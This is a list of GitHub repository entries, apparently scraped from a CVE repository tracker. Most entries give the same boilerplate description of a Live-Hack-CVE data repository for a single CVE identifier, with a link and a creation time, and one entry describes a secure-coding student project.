**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1310 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1310](https://github.com/Live-Hack-CVE/CVE-2022-1310) create time: 2022-12-26T04:50:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1305](https://github.com/Live-Hack-CVE/CVE-2022-1305) create time: 2022-12-26T04:50:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1484 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1484](https://github.com/Live-Hack-CVE/CVE-2022-1484) create time: 2022-12-26T04:50:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1481](https://github.com/Live-Hack-CVE/CVE-2022-1481) create time: 2022-12-26T04:50:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1482 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1482](https://github.com/Live-Hack-CVE/CVE-2022-1482) create time: 2022-12-26T04:50:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1486 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1486](https://github.com/Live-Hack-CVE/CVE-2022-1486) create time: 2022-12-26T04:50:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1483 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1483](https://github.com/Live-Hack-CVE/CVE-2022-1483) create time: 2022-12-26T04:50:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1485](https://github.com/Live-Hack-CVE/CVE-2022-1485) create time: 2022-12-26T04:50:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2234 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2234](https://github.com/Live-Hack-CVE/CVE-2022-2234) create time: 2022-12-26T04:49:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2569 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2569](https://github.com/Live-Hack-CVE/CVE-2022-2569) create time: 2022-12-26T04:49:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34838 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34838](https://github.com/Live-Hack-CVE/CVE-2022-34838) create time: 2022-12-26T04:49:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32746](https://github.com/Live-Hack-CVE/CVE-2022-32746) create time: 2022-12-26T04:49:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2991 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2991](https://github.com/Live-Hack-CVE/CVE-2022-2991) create time: 2022-12-26T04:49:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2959](https://github.com/Live-Hack-CVE/CVE-2022-2959) create time: 2022-12-26T04:49:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37317](https://github.com/Live-Hack-CVE/CVE-2022-37317) create time: 2022-12-26T04:48:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37316](https://github.com/Live-Hack-CVE/CVE-2022-37316) create time: 2022-12-26T04:48:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33678 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33678](https://github.com/Live-Hack-CVE/CVE-2022-33678) create time: 2022-12-26T04:47:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33676 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33676](https://github.com/Live-Hack-CVE/CVE-2022-33676) create time: 2022-12-26T04:47:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34256](https://github.com/Live-Hack-CVE/CVE-2022-34256) create time: 2022-12-26T04:46:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34836](https://github.com/Live-Hack-CVE/CVE-2022-34836) create time: 2022-12-26T04:46:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2031](https://github.com/Live-Hack-CVE/CVE-2022-2031) create time: 2022-12-26T04:46:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36945](https://github.com/Live-Hack-CVE/CVE-2022-36945) create time: 2022-12-26T04:46:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37305](https://github.com/Live-Hack-CVE/CVE-2022-37305) create time: 2022-12-26T04:46:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37418](https://github.com/Live-Hack-CVE/CVE-2022-37418) create time: 2022-12-26T04:46:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38078](https://github.com/Live-Hack-CVE/CVE-2022-38078) create time: 2022-12-26T04:46:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36168 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36168](https://github.com/Live-Hack-CVE/CVE-2022-36168) create time: 2022-12-26T04:46:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36226](https://github.com/Live-Hack-CVE/CVE-2022-36226) create time: 2022-12-26T04:46:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34960 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34960](https://github.com/Live-Hack-CVE/CVE-2022-34960) create time: 2022-12-26T04:46:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37158](https://github.com/Live-Hack-CVE/CVE-2022-37158) create time: 2022-12-26T04:46:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-20001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-20001](https://github.com/Live-Hack-CVE/CVE-2007-20001) create time: 2022-12-26T04:09:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-3294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-3294](https://github.com/Live-Hack-CVE/CVE-2009-3294) create time: 2022-12-26T04:03:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-2906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-2906](https://github.com/Live-Hack-CVE/CVE-2009-2906) create time: 2022-12-26T04:03:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-3436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-3436](https://github.com/Live-Hack-CVE/CVE-2010-3436) create time: 2022-12-26T04:03:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-6150 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-6150](https://github.com/Live-Hack-CVE/CVE-2012-6150) create time: 2022-12-26T04:03:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-20004 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-20004](https://github.com/Live-Hack-CVE/CVE-2013-20004) create time: 2022-12-26T04:09:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4475](https://github.com/Live-Hack-CVE/CVE-2013-4475) create time: 2022-12-26T04:03:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0178 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0178](https://github.com/Live-Hack-CVE/CVE-2014-0178) create time: 2022-12-26T04:03:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20141](https://github.com/Live-Hack-CVE/CVE-2022-20141) create time: 2022-12-26T04:02:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7055 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7055](https://github.com/Live-Hack-CVE/CVE-2016-7055) create time: 2022-12-26T04:03:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9229](https://github.com/Live-Hack-CVE/CVE-2017-9229) create time: 2022-12-26T04:04:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15897](https://github.com/Live-Hack-CVE/CVE-2017-15897) create time: 2022-12-26T04:04:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1050](https://github.com/Live-Hack-CVE/CVE-2018-1050) create time: 2022-12-26T04:03:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20807](https://github.com/Live-Hack-CVE/CVE-2019-20807) create time: 2022-12-26T04:05:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15167](https://github.com/Live-Hack-CVE/CVE-2019-15167) create time: 2022-12-26T04:01:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17569 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17569](https://github.com/Live-Hack-CVE/CVE-2019-17569) create time: 2022-12-26T03:24:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20892 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20892](https://github.com/Live-Hack-CVE/CVE-2019-20892) create time: 2022-12-26T03:24:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10654](https://github.com/Live-Hack-CVE/CVE-2019-10654) create time: 2022-12-26T03:20:53Z

**Secure coding project, research on CVE-2019-17498 and implement a player score function written in C.** : [Timon-L/3007Project](https://github.com/Timon-L/3007Project) create time: 2022-10-09T08:17:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14323 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14323](https://github.com/Live-Hack-CVE/CVE-2020-14323) create time: 2022-12-26T04:03:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35605](https://github.com/Live-Hack-CVE/CVE-2020-35605) create time: 2022-12-26T04:01:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29552](https://github.com/Live-Hack-CVE/CVE-2020-29552) create time: 2022-12-26T03:58:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29550](https://github.com/Live-Hack-CVE/CVE-2020-29550) create time: 2022-12-26T03:58:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35680 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35680](https://github.com/Live-Hack-CVE/CVE-2020-35680) create time: 2022-12-26T03:58:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35728](https://github.com/Live-Hack-CVE/CVE-2020-35728) create time: 2022-12-26T03:25:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36181](https://github.com/Live-Hack-CVE/CVE-2020-36181) create time: 2022-12-26T03:25:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36183](https://github.com/Live-Hack-CVE/CVE-2020-36183) create time: 2022-12-26T03:25:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36182 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36182](https://github.com/Live-Hack-CVE/CVE-2020-36182) create time: 2022-12-26T03:25:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36184 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36184](https://github.com/Live-Hack-CVE/CVE-2020-36184) create time: 2022-12-26T03:25:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36185](https://github.com/Live-Hack-CVE/CVE-2020-36185) create time: 2022-12-26T03:25:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36186 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36186](https://github.com/Live-Hack-CVE/CVE-2020-36186) create time: 2022-12-26T03:25:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36187](https://github.com/Live-Hack-CVE/CVE-2020-36187) create time: 2022-12-26T03:25:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25020](https://github.com/Live-Hack-CVE/CVE-2020-25020) create time: 2022-12-26T03:24:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10492](https://github.com/Live-Hack-CVE/CVE-2020-10492) create time: 2022-12-26T03:24:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15025 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15025](https://github.com/Live-Hack-CVE/CVE-2020-15025) create time: 2022-12-26T03:24:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13596](https://github.com/Live-Hack-CVE/CVE-2020-13596) create time: 2022-12-26T03:24:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1456](https://github.com/Live-Hack-CVE/CVE-2020-1456) create time: 2022-12-26T03:24:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17498](https://github.com/Live-Hack-CVE/CVE-2020-17498) create time: 2022-12-26T03:24:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7791](https://github.com/Live-Hack-CVE/CVE-2020-7791) create time: 2022-12-26T03:24:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26420](https://github.com/Live-Hack-CVE/CVE-2020-26420) create time: 2022-12-26T03:24:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26422](https://github.com/Live-Hack-CVE/CVE-2020-26422) create time: 2022-12-26T03:24:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13254](https://github.com/Live-Hack-CVE/CVE-2020-13254) create time: 2022-12-26T03:24:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26418](https://github.com/Live-Hack-CVE/CVE-2020-26418) create time: 2022-12-26T03:24:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26419](https://github.com/Live-Hack-CVE/CVE-2020-26419) create time: 2022-12-26T03:24:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26421 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26421](https://github.com/Live-Hack-CVE/CVE-2020-26421) create time: 2022-12-26T03:24:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10726 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10726](https://github.com/Live-Hack-CVE/CVE-2020-10726) create time: 2022-12-26T03:24:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27825](https://github.com/Live-Hack-CVE/CVE-2020-27825) create time: 2022-12-26T03:24:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36180 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36180](https://github.com/Live-Hack-CVE/CVE-2020-36180) create time: 2022-12-26T03:23:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36188](https://github.com/Live-Hack-CVE/CVE-2020-36188) create time: 2022-12-26T03:23:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3872](https://github.com/Live-Hack-CVE/CVE-2021-3872) create time: 2022-12-26T04:06:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4136](https://github.com/Live-Hack-CVE/CVE-2021-4136) create time: 2022-12-26T04:06:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3864](https://github.com/Live-Hack-CVE/CVE-2021-3864) create time: 2022-12-26T04:05:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3856 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3856](https://github.com/Live-Hack-CVE/CVE-2021-3856) create time: 2022-12-26T04:05:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3754 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3754](https://github.com/Live-Hack-CVE/CVE-2021-3754) create time: 2022-12-26T04:05:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3735](https://github.com/Live-Hack-CVE/CVE-2021-3735) create time: 2022-12-26T04:05:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3703](https://github.com/Live-Hack-CVE/CVE-2021-3703) create time: 2022-12-26T04:04:50Z

